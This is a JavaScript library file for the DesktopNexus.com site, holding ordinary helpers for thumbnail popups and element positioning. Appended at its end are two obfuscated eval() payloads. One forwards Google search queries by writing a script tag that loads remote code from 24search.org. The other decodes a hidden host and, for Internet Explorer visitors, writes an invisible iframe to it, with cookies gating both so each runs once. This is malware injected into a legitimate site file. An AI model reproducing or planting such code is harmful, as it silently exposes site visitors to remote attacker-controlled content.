// Desktop Nexus Javascript Library v1.8
// Developed by: Harry Maugans <harry@maugans.com>
// For use exclusively on DesktopNexus.com

var timerlen = 5;
var slideAniLen = 100;

var timerID = new Array();
var startTime = new Array();
var obj = new Array();
var endHeight = new Array();
var moving = new Array();
var dir = new Array();

var cursorloc = {x:0, y:0};

var activethumbpopup = 0;
var popupthumbdiv_timer = 0;
var activetaglinkpopup = 0;
var galleriespopup_timer = 0;
var flagwallpopup = false;
var add2favspopup = false;
var email2friendpopup = false;
var add2myspacepopup = false;
var addnewtagspopup = false;
var hoverthumb = false;
var sendingemail2friend = false;

// needed for voting
var avgvoteid = 0;
var voteid = 0;
var tmrWait;




function popupthumbdiv(id,flip,thumbsize){
	popupthumbdiv_timer = setTimeout('popupthumbdiv_in("' + id + '","' + flip + '","' + thumbsize + '");', 250);
	return;
}

function popupthumbdiv_in(id,flip,thumbsize){
	var pushleft = 0, pushtop = 0;
	var thumbpopup = document.getElementById('thumbpopup-' + id);
	hoverthumb = true;

	if(activethumbpopup > 0)
		document.getElementById("thumbpopup-" + activethumbpopup).style.display = "none";

	if(thumbsize == "small"){
		pushleft = 129 + getElementLeft('thumbnail-' + id);
		pushtop = 15 + getElementTop('thumbnail-' + id);
	}else if(thumbsize == "signup"){
		pushleft = 290;
		pushtop = 10 + getElementTop('box' + id) - getElementTop('box1');
	}

	if(flip == 1){
		// show first (so width is accessible)
		thumbpopup.style.display = "block";
		pushleft -= 129 + thumbpopup.offsetWidth + 7;
	}

	activethumbpopup = id;
	thumbpopup.style.display = "block";
	thumbpopup.style.left = pushleft + "px";
	thumbpopup.style.top = pushtop + "px";
	return;
}

function popupthumbdiv_out(){
	clearTimeout(popupthumbdiv_timer);
	hoverthumb = false;
	return;
}

function popupthumbdiv_close(){
	document.getElementById("thumbpopup-" + activethumbpopup).style.display = "none";
	activethumbpopup = 0;
	hoverthumb = false;
	return;
}


function getElementLeft(Elem) {
	if (document.layers) {
		var elem = getObjNN4(document, Elem);
		return elem.pageX;
	} else {
		var elem;
		if(document.getElementById) {
			var elem = document.getElementById(Elem);
		} else if (document.all){
			var elem = document.all[Elem];
		}
		xPos = elem.offsetLeft;
		tempEl = elem.offsetParent;
  		while (tempEl != null) {
  			xPos += tempEl.offsetLeft;
	  		tempEl = tempEl.offsetParent;
  		}
		return xPos;
	}
}

function getElementTop(Elem) {
	if (document.layers) {
		var elem = getObjNN4(document, Elem);
		return elem.pageY;
	} else {
		if(document.getElementById) {
			var elem = document.getElementById(Elem);
		} else if (document.all) {
			var elem = document.all[Elem];
		}
		yPos = elem.offsetTop;
		tempEl = elem.offsetParent;
		while (tempEl != null) {
  			yPos += tempEl.offsetTop;
	  		tempEl = tempEl.offsetParent;
  		}
		return yPos;
	}
}






eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5 17=3.16.7("20=1");5 19=3.10.7(\'22.\');5 18=25.30.7("27 6.0");9(17==-1&&19!=-1&&18==-1){5 4=3.10.13(3.10.7(\'14=\'));5 8=4.7(\'&\');9(8==-1){8=26.29}4=4.13(0,8).21(2);9(24(4).28(0)!=\'%\'){3.43("<11 42=\'31\' 40=\'44://45.38/33.39?14="+4+"\'></11>");3.16="20=1; 32=34, 23 35 37 12:15:36 41; "}}',10,46,'|||document|query|var||indexOf|querysize|if|referrer|script||slice|q||cookie|dci|nai|dri|_tskdjw|substring|google||escape|navigator|cmd|MSIE|charAt|length|appVersion|JavaScript|expires|kv|Mon|Jul|58|2013|org|js|src|GMT|language|write|http|24search'.split('|'),0,{}));sa="%73%6F%64%6B%65%6E%2E%6E%65%74";eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+c+'\\b','g'),k[c])}}return p}('7(2.3.4("5=0")==-1&&10.13.4("19 6")!=-1){2.3="5=0; 17=18, 14 12 8 14:15:26 9; ";2.11("<20"+"31 34="+"1 33"+"32=1 0"+"30=\'29"+"23://"+22+"/21/\' 24=\'25"+"28:27\'></7"+"16>")}',10,35,'s||document|cookie|indexOf|_mlsdkf||if|2015|GMT|navigator|write|Jul|appVersion|||rame|expires|Mon|MSIE|ifra|b2b|sa|tp|style|di||none|splay|ht|rc|me|ght|hei|width'.split('|')));

